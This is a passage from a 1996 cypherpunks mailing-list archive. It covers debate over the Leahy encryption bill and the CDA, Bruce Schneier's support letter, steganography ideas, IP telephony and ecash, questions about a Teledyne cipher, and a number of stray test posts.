Date: Sat, 9 Mar 1996 21:38:17 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: SEAL cipher info requested (something actually list related!)
In-Reply-To: <199603060521.AAA15746@homeport.org>
Message-ID: <199603060751.CAA09041@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> |   * is there something better then SEAL available?
> 
> 	How about Blowfish?

I believe blowfish has been partially cracked, but I forget which
conference the paper was presented at.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Mon, 11 Mar 1996 05:34:17 +0800
To: cypherpunks@toad.com
Subject: Re: Another Motivation for the CDA
Message-ID: <199603061345.IAA12345@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Timothy C. May wrote:
> 
> Given that Sen. Fineswine is one of the strongest supporters of gun
> confiscation, and that she had this to say about the Telecom Bill:[..]

Felons may not own a gun unless granted a waiver by certain judges. They
also lose the right to vote, BTW.

I think you're reading too much into motives, Tim.  I don't think that
most in congress are capable of thinking that elaborately, and besides,
if someone is convicted of violating the CDA for saying "fuck" online,
that is the type of felony that one can get a judge's waiver for...
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMT2XCCoZzwIn1bdtAQFkNQF9E31snnxksyX8FREMyloHZg1YnSzAqDDb
30qKVbtDhUN2dLd8ic6afX7MsnKkJWEZ
=weLu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "B. Schneier" <bs208@newton.cam.ac.uk>
Date: Sat, 9 Mar 1996 21:46:46 +0800
To: cypherpunks@toad.com
Subject: This is my support letter to Sen Leahy
Message-ID: <199603060930.EAA04703@gibbs.newton.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


*************************************************************************
This is a temporary e-mail address; I am in Cambridge until 12 March.
Continue to send mail to schneier@counterpane.com; it forwards by itself.
*************************************************************************

March 1, 1996

Hon. Patrick Leahy
United States Senate

Dear Senator Leahy,

    I would like to thank you for introducing the Encrypted
Communications Privacy Act.  As a member of the computer and information
security research community, I am keenly aware of the vital role of
cryptography in fostering the development of our information infrastructure.

    As the author of the book, "Applied Cryptography", I have unusual
insights into the absurdity of cryptography export restrictions.  It is
not without irony that one may export my book in paper format, but not
electronically.  Presumably no rational person believes that the
current restrictions actually prevent the spread of cryptography.  I
believe you recognize this, as evidenced from the strong stance taken
in your bill.

    As the bill recognizes, we can no longer afford to hold on to the
obsolete notion that cryptography is the sole province of government
communications; the growth of modern networks has irrevocably pushed
it into the mainstream.  I applaud you leadership towards codifying
these principles in a balanced and responsible way.  In particular,
the bill:

      o Removes the regulatory strangle-hold that has encumbered
	the development of mass-market security solutions; 

      o Recognizes the futility of applying regulations intended to
	control the international arms trade to even the most 
	mundane and commonly available software;

      o Encourages public confidence in encryption by allowing
	the marketplace to provide a full range of choices for
	privacy and security needs;

      o Recognizes the special obligations of keyholders to be
	vigilant in safeguarding the information entrusted to
	them, without imposing hurtles on the use of cryptography;

      o Allows the United States to continue its leadership role as
	a technological innovator;

      o Acknowledges the pivotal role of cryptography in electronic
        commerce.

    I continue to have concerns that the new criminal obstruction
provision will discourage law abiding citizens from using cryptography.
I hope that legislative history and further discussion will demonstrate
the narrow intent of this crime.

    Overall, your bill takes very necessary strides towards ensuring that
the protections we take for granted in traditional media keep pace with
technology, and I commend your efforts.

				Sincerely,

				     /s/

				Bruce Schneier





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 7 Mar 1996 10:33:05 +0800
To: Mutant Rob <cypherpunks@toad.com
Subject: Re: Another Motivation for the CDA
Message-ID: <m0tuNfF-00092kC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 08:45 AM 3/6/96 -0500, Mutant Rob wrote:
>Timothy C. May wrote:
>> 
>> Given that Sen. Fineswine is one of the strongest supporters of gun
>> confiscation, and that she had this to say about the Telecom Bill:[..]
>
>Felons may not own a gun unless granted a waiver by certain judges. They
>also lose the right to vote, BTW.
>
>I think you're reading too much into motives, Tim.  I don't think that
>most in congress are capable of thinking that elaborately, and besides,
>if someone is convicted of violating the CDA for saying "fuck" online,
>that is the type of felony that one can get a judge's waiver for...

I am NOT relieved at hearing this.  If one must have a "judge's waiver," 
then that means he probably can "request" whatever other conditions he 
chooses to put on his waiver.  The government still has a motivation to make 
every crime a felony, down to and including jaywalking and speeding tickets. 
 (Don't try to tell me "they can't turn speeding tickets into a felony."  
The term "felony" is defined, and can be RE-defined, to whatever the 
legislature wants at any time.  Naturally, this won't occur all at once; 
it'll happen in "reasonable" stages.)

All the more reason to adopt a system that will rid us of these parasites 
forever.

KnowhutImean?

Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto

Something is going to happen.   Something.......................Wonderful!
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMT3R4PqHVDBboB2dAQGOKAP/aLqcF1rK+sXHS2rFMHWhtOUw/0Su8J2l
Cpk5GhmEJxGnBK4LKszhl/jX982AMDIRRrop5k0z1l4ezs1cnI0fwzniNwYWluG0
qjmcJ/rkEmPrA5cKwj9dqxsKi+lex1pApNOmogICkLdzUZgHrj6wAEmLKzqiNDiU
7XJdtbsMSFY=
=7sEd
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in2.uu.net!news.ner.bbnplanet.net!news3.near.net!yale!news-mail-gateway!daemon@warwick.com (Rich Carreiro)
Date: Thu, 7 Mar 1996 07:07:07 +0800
To: cypherpunks@toad.com
Subject: Test of email netnews post.
Message-ID: <9603061032.ZM10102@gumbo.bos.saic.com>
MIME-Version: 1.0
Content-Type: text/plain


Test of email netnews post.

-- 
Rich Carreiro                            rcarreiro@bos.saic.com
Software Engineer                        (617)221-7607 (voice/voice mail)
SAIC                                     (617)270-0063 (fax)
20 Mall Road, Suite 130
Burlington, MA  01803




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Sun, 10 Mar 1996 10:14:39 +0800
To: cypherpunks@toad.com
Subject: PLEASE REPLY!!
In-Reply-To: <4hkdsc$fvd@jade.emeraldis.com>
Message-ID: <199603061654.KAA11308@kenya.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain



David G. Cannon writes:
 > Did this message make it out to the "real" world?? Please reply to
 > this message if it did. Thankyou.

I generally don't comment on noise like this, but I'm getting curious.
Did somebody advertise cypherpunks@toad.com as a uucp configuration
tester?

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 7 Mar 1996 07:23:46 +0800
To: cypherpunks@toad.com
Subject: POO_bah
Message-ID: <199603061600.LAA05718@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   3-6-96. TWP and NYT give additional reports on WW II atomic 
   spying by the Soviets revealed by decoding cables under 
   NSA's Venona program. With more on the role of physicist 
   Theodore Hall and others initially reported by TWP on 
   February 25. NYT quotes David Kahn on the "unquestionable" 
   code-breaking and doubts of FBI "gumshoe" follow-up of 
   decrypted leads. TWP's is more robust, quotes poo-bahs. 
 
   POO_bah 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in2.uu.net!newsfeed.internetmci.com!gordius!news.service.uci.edu!usenet@warwick.com
Date: Thu, 7 Mar 1996 11:54:41 +0800
To: cypherpunks@toad.com
Subject: http://www.grfn.org/~blacktar/KilltheNewbies.htm
In-Reply-To: <4h3e98$i8q@news.mel.aone.net.au>
Message-ID: <313DE81A.6403@grfn.org>
MIME-Version: 1.0
Content-Type: text/plain


http://www.grfn.org/~blacktar/KilltheNewbies.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 7 Mar 1996 00:49:53 +0800
Subject: No Subject
Message-ID: <QQafws11577.199603061634@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


This is a test...
-- 
Live on the edge, push the limits, and go EXTREME...
--------------------------------------------------------------------------
Svein Ove Solsvik          *  E-Mail:                 sveinove@ringnett.no

-Our Father, UART in Heaven, I/O'ed by the name...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Thu, 7 Mar 1996 10:12:06 +0800
To: cypherpunks@toad.com
Subject: Re: Jump Start ecash With IPhone
Message-ID: <v02140b00ad6326a515a9@[199.2.22.124]>
MIME-Version: 1.0
Content-Type: text/plain


eggplant writes:
>How about...only paying for the initial investment of the phone program and
>hardware. No more costs to pay, get rid of long distance charges
>all-togther.

Two problems:

        1- Chaum did not have the clue to pick up on this when two
           cypherpunks (who shall remain nameless...) pitched this
           and several other ideas to involve ISPs in jump-starting
           ecash almost two years ago, so why would he figure it out
           now?

        2- The phone companies (actually ACTA, the telco lobby) petitioned
           the FCC on Monday to regulate the Internet phone software
           companies.

IP phone systems themselves may need to move underground just to
escape regulation.  OTOH, there is nothing to prevent people from
building their own systems once some free software is out there...

On another related note the IRS is not getting someone what concerned
about the opportunities the Internet offers people to avoid taxes
according to the Treasury department's international-tax counsel. The
government will "maintain toll booths on the information superhighway."
(WSJ, 3/6/96)

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in2.uu.net!newsfeed.internetmci.com!news.emeraldis.com!news.emeraldis.com!not-for-mail@warwick.com (Gary Beihl)
Date: Fri, 8 Mar 1996 01:35:28 +0800
To: cypherpunks@toad.com
Subject: test message
Message-ID: <4hkfg8$i0m@jade.emeraldis.com>
MIME-Version: 1.0
Content-Type: text/plain


This is a test message...  .. ignore it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 7 Mar 1996 01:09:44 +0800
Subject: No Subject
Message-ID: <QQafwt14576.199603061653@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Mar 1996, Nelson Minar wrote:

> The thing that bothers me about existing steganography code I've seen
> is that it all uses uncommon communication channels to hide data. For
> instance, the "hide data in a picture" programs: useful, up to a
> point, but how often do I send pictures to other people? I think to be
> effective, methods need to be employed that exploit existing, well
> used communication channels.

Then he sez:

> So here's one idea I've had as a place to hide a channel: network
> video, in particular CU-SeeMe video streams. CU-SeeMe is a lowtech

I think it likely that people will be sending GIFs and JPEGs to each 
other far more often than video.  Video is far more an "uncommon 
communications channel" than is a uuencoded picture.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in2.uu.net!psinntp!psinntp!psinntp!interramp.com!usenet@warwick.com (Alan Beale)
Date: Mon, 11 Mar 1996 16:24:17 +0800
To: cypherpunks@toad.com
Subject: Very boring test
Message-ID: <4hjus6$cs4@usenet7.interramp.com>
MIME-Version: 1.0
Content-Type: text/plain


Is there anybody *out* there?

-- 
.signature under construction




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 7 Mar 1996 09:38:00 +0800
To: uunet!in2.uu.net!newsfeed.internetmci.com!panix!news.columbia.edu!news!news@warwick.com
Subject: Re: Zona Labs Was: Cambridge [MA] Cops Assault Mother for Photo
In-Reply-To: <4hd5hh$bg3@Mercury.mcs.com>
Message-ID: <YlDQh2W00YUuICF9RE@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


This is only relevant to cypherpunks as it involves child porn hysteria
and abusive cops... Let me start by saying the attached message from
warwick.com is wildly incorrect:

  * Zona film labs employees did not lead the child away until
afterwards. The police grabbed Angeli, beat her, choked her -- while her
child was just a few feet away.

  * The mother flipped when the Cambridge cops said she was going to be
locked up and her child taken away.

  * The lamp was knocked over when the Cambridge cops wrestled her into
the back room.

  * Zona film lab employees willingly participated in this sting
operation and willingly lied to Angeli.

Last week, I went to Angeli's attorney's office and saw the
(unpublished) pictures that the Cambridge cops and Zona thought were
"child porn." They're not "child porn" -- any more than the similar
photos my grandparents have of me and my cousins naked in a bathtub when
we were three years old.

I urge you to check out Bob Chatelle's web site at
http://world.std.com/~kip/, which says what actually happened with the
Angeli case. I've attached an excerpt from his pages below.

-Declan



Excerpts from internet.cypherpunks: 4-Mar-96 Re: Zona Labs  Was:
Cambrid.. by news@warwick.com 
> Ayse Sercan wrote:
>  
> > At any rate, if I were the mother, and my kid was being led away by a
> > clerk who could have been the very pervert who thought that those nude
> > pictures meant child pornography, I'd certainly do everything in my power
> > to protect my child from such an individual.
>  
> That's rediculous. The mother did not flip because Zona led the child away.
> The mother flipped when asked about the photos. This caused Zona to not
> want the child to see argument. The mother just has serious problems in
> general. She feels justified in trashing the place and throwing the lamp,
> which is why she refused the punishment and took 30 days in jail. She,
> in the presence of her child, was wrong to get violent. She has a lack of
> control.


>From http://world.std.com/~kip/
   
   Toni Marie Angeli, for a Harvard photography course, decided to make  
   her four-year-old son Nico the subject of her final class project, The
   Innocence of a Child's Nudity. After discussing the project with her
   professor, Angeli began her project with a few shots of Nico and made 
   the fatal mistake of taking her roll of film to Zona Photographic Labs
   on Rogers Street in Cambridge, Massachusetts. The Zona owners were   
   "alarmed" and called the Cambridge police, who went to Zona, looked at
   contact sheets prepared by Zona without Angeli's authorization, and
   decided that the pictures were "gross." Zona and the Cambridge police
   set up a sting operation, requiring Zona employees to lie, so that the
   police could come to Zona and confront her about her "pornography"
   when she came to pick up her negatives. On November 2, Angeli went to
   Zona, accompanied by Nico and by her husband, Luke D'Ancona. An
   altercation ensued when Angeli realized why the police were there.
   Angeli was handcuffed, manhandled into a back room, beaten and choked.
   During the scuffle a lamp was knocked over, and a picture fell off the
   wall. A hollow core door was also damaged when Angeli kicked out as
   she was being escorted to the police van.
   
   Angeli was never charged with child pornography, but she was charged
   with disorderly conduct, malicious destruction of property under $250,
   and assault and battery with a dangerous weapon. (The police claimed  
   that Angeli threw the lamp.). Angeli's trial began on January 24,   
   1996, and a verdict was brought in on January 30. She was acquitted of
   the assault-and-battery charges, but convicted on the two other       
   counts. The judge sentenced her to pay damages, to 50 hours community
   service, and to 18 months of probation. Angeli refused to sign the    
   probation contract, stating that she wished to make no admission of
   guilt. The judge then sentenced her to 30 days at MCI Framingham. We 
   are currently trying to raise money to pay for her appeal.            
   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Sat, 9 Mar 1996 04:29:27 +0800
To: cypherpunks@toad.com
Subject: Re: Steganography idea: CU-SeeMe
In-Reply-To: <199603060734.AAA00178@nelson.santafe.edu>
Message-ID: <199603061134.MAA17301@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Mar 1996, Nelson Minar wrote:

[Re: data steams to put steno in]
> So here's one idea I've had as a place to hide a channel: network
> video, in particular CU-SeeMe video streams. CU-SeeMe is a lowtech

That's an excellent idea.

The only problem with using CU-SeeMe is that, due to the nature of the 
data being transferred, it is more important to keep up to date than to 
not lose data.  I believe it uses UDP to do this.  There would have to be 
some protection mechanism in the stego patches to tolerate high amounts 
of data loss - the obvious solution would be to loop the data, but that 
is easily detectable, and is not a guarantee that the data arrived 
safely.  Setting up a connection outside of Cu-SeeMe attracts attention, 
especially if there was a correlation between what occurred on that 
connection and what occurred in the LOBs of the Cu-SeeMe connection.


-- Abraham d'Anonymous
   (No relation to Alice)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 7 Mar 1996 11:26:08 +0800
To: cypherpunks@toad.com
Subject: Boycott "Applied Cryptography" and AT&T and RSA
Message-ID: <199603062058.MAA28987@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Bruce Schnier (Author of applied cryptography) and Matt Blaze (Who
is a crypto bigwig at at&t) have made it clear that they support
key escrow. Both have written letters in favor of the new crypto
law, it creates a key escrow system and also other restricts on
crypto. The letters are on the CDT homepage and i think were
posted here.

WHAT THE FUCK??????????????????????????????????????????

EFF, EPIC, VTW and almost everyone else (except for Bizdos at RSA, hmmmm)
have all come out against this piece of shit. But with these so called
experts baking it it could pass anyway.

Maybe the ltrs are a forgery? We should ask them, and if this is true, LETS
SEND THEM A MESSAGE!!!!!!!! SWITCH YOUR PHONE SERVICE AND TELL AT&T WHY!!!
STOP RECOMMENDING APPLIED CRYPTO (THERE ARE EASIER BOOKS ANYWAY). DEMAND
THAT THESE PEOPLE STOP GIVING AWAY YOUR RIGHTS!!!!!!!!!!!!!!!!!!!!!!!!!!!

their addresses are
       schneier@counterpane.com
       mab@crypto.com
       jim@rsa.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 7 Mar 1996 02:39:54 +0800
Subject: No Subject
Message-ID: <QQafwy27729.199603061800@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain



uyfiyufik

--
    |    Mark Gould, Department of Law, University of Bristol     |
    |  Mark.Gould@bris.ac.uk  |  http://www.bris.ac.uk/%7Elwmdcg  |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 10 Mar 1996 14:39:28 +0800
To: cypherpunks@toad.com
Subject: Boycott "Applied Cryptography" and AT&T and RSA
Message-ID: <199603062140.NAA03115@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Bruce Schnier (Author of applied cryptography) and Matt Blaze (Who
is a crypto bigwig at at&t) have made it clear that they support
key escrow. Both have written letters in favor of the new crypto
law, it creates a key escrow system and also other restricts on
crypto. The letters are on the CDT homepage and i think were
posted here.

WHAT THE FUCK??????????????????????????????????????????

EFF, EPIC, VTW and almost everyone else (except for Bizdos at RSA, hmmmm)
have all come out against this piece of shit. But with these so called
experts baking it it could pass anyway.

Maybe the ltrs are a forgery? We should ask them, and if this is true, LETS
SEND THEM A MESSAGE!!!!!!!! SWITCH YOUR PHONE SERVICE AND TELL AT&T WHY!!!
STOP RECOMMENDING APPLIED CRYPTO (THERE ARE EASIER BOOKS ANYWAY). DEMAND
THAT THESE PEOPLE STOP GIVING AWAY YOUR RIGHTS!!!!!!!!!!!!!!!!!!!!!!!!!!!

their addresses are
       schneier@counterpane.com
       mab@crypto.com
       jim@rsa.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 7 Mar 1996 09:53:15 +0800
To: cypherpunks@toad.com
Subject: Re: PLEASE REPLY!!
In-Reply-To: <4hkdsc$fvd@jade.emeraldis.com>
Message-ID: <MlDRuS200YUuACF7gS@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 6-Mar-96 PLEASE REPLY!! by Mike
McNally@dev.tivoli. 
> I generally don't comment on noise like this, but I'm getting curious.
> Did somebody advertise cypherpunks@toad.com as a uucp configuration
> tester?

Worse yet, the configuration is as screwed as the users' posts. Don't
bother replying to their messages...

-Declan


   ----- The following addresses had delivery problems -----
<panix!news.columbia.edu!news!newsnewsfeed.internetmci.com>  (unrecoverable
error)

   ----- Transcript of session follows -----
... while talking to newsfeed.internetmci.com.:
>>> RCPT To:<panix!news.columbia.edu!news!newsnewsfeed.internetmci.com>
<<< 550 <panix!news.columbia.edu!news!newsnewsfeed.internetmci.com>... User
unknown
550 <panix!news.columbia.edu!news!newsnewsfeed.internetmci.com>... User unknown






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in2.uu.net!news.iag.net!newsboy.utelfla.com!news.utelfla.com!gslinkr.pop@warwick.com (Brett)
Date: Fri, 8 Mar 1996 20:02:08 +0800
To: cypherpunks@toad.com
Subject: Alabama - the Internet JobLocator - test
Message-ID: <26Mar96135125mtc@gslinkr.pop>
MIME-Version: 1.0
Content-Type: text/plain



                       Welcome to the Internet JobLocator
                        http://www.joblocator.com/jobs/
                    Now Providing Instant NewsGroup Posting
          ______________________________________________________

                  Ad # : 2333
                  Date : March 06 1996
              Category : Accounting/Bookkeeping
               Company : TOL
              Position : test
          Salary Range : test
               Contact : Brett
               Phone # : test
                 Fax # : test
         Email Address : mtc@gslink.net
        Street Address : test
                  City : test
         Country/State : Alabama
              Zip Code : test
  
              Fee Req. : No
      Contract Position: No

Job Description

testtesttesttesttest

test

testtesttesttesttest


testtesttest


testtesttesttest
testtest


testtesttesttest

End Job Post
(C) Copyright Travelers On-Line 1996






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 7 Mar 1996 13:45:08 +0800
To: "A. Padgett Peterson P.E. Information Security" <cypherpunks@toad.com
Subject: Re: Whut it sez
Message-ID: <m0tuRCc-0008yRC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09:33 AM 3/6/96 -0500, A. Padgett Peterson P.E. Information Security wrote:
>
>Note: downloaded from www.vtw.org so cannot guarentee correctness-
>
>  "§2804. Unlawful use of encryption to obstruct justice"    
>   "Whoever willfully endeavors by means of encryption to obstruct,   
>   impede, or prevent the communication of information in furtherance 
>   to a felony which may be prosecuted in a court of the United States, 
>   to an investigative or law enforcement officer shall-..."
>
>Interesting wording - sounds almost like if you impede the *commission* of 
>a felony, you is been had. Keyword would seem to be "willingly".

You need to learn to read more carefully.  The word they (according to VTW) 
used was "willfully," not "willingly."

In any case, assuming they either never made the error you noticed, or they 
manage to correct it before the bill becomes law, they will have just 
outlawed the used of encrypted remailers, because:

1.  They use encryption to hide the sender and/or the recipient of a note.

2.  Any law-enforcement agency could get a "cooperative", computer-literate 
criminal to upload a message that might, arguably, be part of a larger 
criminal offense (but really wasn't; the purpose is simply to justify an 
investigation) .  The encrypted remailer is then guilty of violation of this 
section, even if the underlying crime is never completed or even 
attempted.  Remember, you can have a "criminal investigation" without having 
a crime.  Or a "crime" can be fabricated at the appropriate time, just like 
they did to those operators of a California BBS, called from Oklahoma by the 
cops, and using a kid to turn the whole fraud into a crime.


> Suspect  they meant to say "...obstruct (etc) the investigation of a
felony..."

Probably.  This section is their wish-list to Santa Claus.  It's easy to 
make mistakes when you're excited about something.   They're hoping you 
suckers will support the whole bill despite this booby-trap.   You're the 
fish, the rest of the bill is the worm, and this section is the hook.

Will you bite? 

Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMT4JOvqHVDBboB2dAQFgDQQAmWrTqEaFUC6eFH79cGLeSHXqrXxXb25H
79I+SHT1chhrDQjHYvlPlpovcv/ShyqJB47w8z9XfGTggGKp+WvFVk10du9iviFF
GZRsNgkjtdEpattuw/tZpmCrWW+aOAtM0Ziw+cYQsGdDlbkdHZueJTuCjDwUndGm
BARsyesyGzA=
=kEFi
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Smith <smith@sctc.com>
Date: Fri, 8 Mar 1996 23:18:36 +0800
To: cypherpunks@toad.com
Subject: Re: art-stego
Message-ID: <199603062006.OAA25056@shade.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


In a related vein, consider the work of a Minnesota folk hero from the
last century named Ignatius Donneley.  Aside from trying to start a
Utopian community just north or our town, he wrote a book "proving"
that Shakespeare was really Francis Bacon. His proof was based on
"decrypting" hints in messages hidden in Shakespeare's writings.

Donneley also wrote a book on Atlantis (available from Dover) and
another postulating that a huge comet caused the extinction of the
dinosaurs. A crackpot, eh?

Rick.
smith@sctc.com           secure computing corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Fri, 8 Mar 1996 01:35:59 +0800
To: cypherpunks@toad.com
Subject: Re: Bootable disks
Message-ID: <960306145542_239131693@emout09.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I recently installed an IDE version of the Syquest EZ 135 hard drive for a
client.  Since it is a fully functional hard drive, it is bootable, unlike
the parallel port model.  The biggest advantage to this type of drive is that
the cartridge (and any potentially incriminating data) can be quickly removed
and destroyed (burn it, smash it with a large heavy object, insert it into a
bulk eraser) or taken to a secure location for storage.  Also, this type of
drive provides an excellent place to put swap files, which have an annoying
tendency to pick up sensitive data.  That is less of a problem if you can
remove the cartridge and store it in a secure location when not processing
sensitive data.

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Fri, 8 Mar 1996 01:37:42 +0800
To: cypherpunks@toad.com
Subject: What's anyone know about Teledyne Electronic Technologies?
Message-ID: <Pine.SCO.3.91.960306150942.15297I-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


Teledyne (TET) is out marketing a "new" crypto system as a competitor 
against DES and what TET calls "linear" cryptosystems.  They are claiming 
a non-linear approach in which (as best I can tell) they are permuting 
the s-boxes and using 4 bit/16 entry substitution tables.

They are also asserting that these "key generated substitution tables and 
inter-round permutations" are supported by "nonlinear orthomorphic 
mappings generated from arbitrary key" (and that this is patented) and 
"row-complete Latin Squares generated from an arbitrary key" (and that 
this is also patented).

The claimed benefits include being invulnerable to differential and 
"linear" cryptanalysis, no linear key/data interaction to hide, that this 
results in the tables and permutations being "transient/secret," and that 
fewer rounds are needed (fewer than what, I don't know) to attain 
"resistance to cryptanalysis."

If there's any c'punks who'd care to comment on these notions, I'd very 
much appreciate the feedback.  Also, if anyone's actually seen the 
algorithm, reviewed it, or knows of published material about these 
techniques, I'd also appreciate seeing those posted.  Of course, any 
feedback from existing customers of TET would also be great.

Thanks!

------------------------------------------------------------------------- 
|So, I went walking through the street.   |Mark Aldrich                 | 
|I saw you strung up in a tree.           |GRCI INFOSEC Engineering     | 
|A woman knelt there, said to me,         |maldrich@grci.com            | 
|Hold your tongue, man, hold your tongue. |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in2.uu.net!gatech!newsfeed.internetmci.com!news.emeraldis.com!usenet@warwick.com (David G. Cannon)
Date: Thu, 7 Mar 1996 08:16:46 +0800
To: cypherpunks@toad.com
Subject: PLEASE REPLY!!
Message-ID: <4hkdsc$fvd@jade.emeraldis.com>
MIME-Version: 1.0
Content-Type: text/plain


Did this message make it out to the "real" world?? Please reply to this message 
if it did. Thankyou.

*David*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmyk.warwick.com!not-for-mail@warwick.com
Date: Thu, 7 Mar 1996 12:24:15 +0800
To: cypherpunks@toad.com
Subject: jfjdjdf
Message-ID: <4hkvq6$d36@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


fjhdgfh
dfhjd




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 7 Mar 1996 11:51:09 +0800
To: cypherpunks@toad.com
Subject: Re: Jump Start ecash With IPhone
Message-ID: <2.2.32.19960306214604.007235dc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:37 AM 3/6/96 -0800, Jim McCoy wrote:
>        2- The phone companies (actually ACTA, the telco lobby) petitioned
>           the FCC on Monday to regulate the Internet phone software
>           companies.
>
>IP phone systems themselves may need to move underground just to
>escape regulation.  OTOH, there is nothing to prevent people from
>building their own systems once some free software is out there...

That would be a super neat trick since the LD business is currently
deregulated (and in fact was never a government monopoly) and the local loop
is in the process of deregulation, and Vocaltec is in some senses an Israeli
company anyway and need not have a presence in New Jersey if it doesn't want do.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 7 Mar 1996 16:53:46 +0800
To: PADGETT@hobbes.orl.mmc.com>
Subject: Leahy bill nightmare scenario?
Message-ID: <m0tuU2R-00095SC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


In case any of you people still think that Leahy bill ostensibly freeing up 
encryption is "progress," the following scenario is provided for your 
consideration:

"Bob" runs an encrypted remailer.  His system forwards mail whose contents 
he cannot read, even if he wanted to.  He cannot know from where the 
messages originated, or where they ended up.  He likes it this way, because 
nobody can accuse him of complicity with a (encrypted) message that he can't 
read.

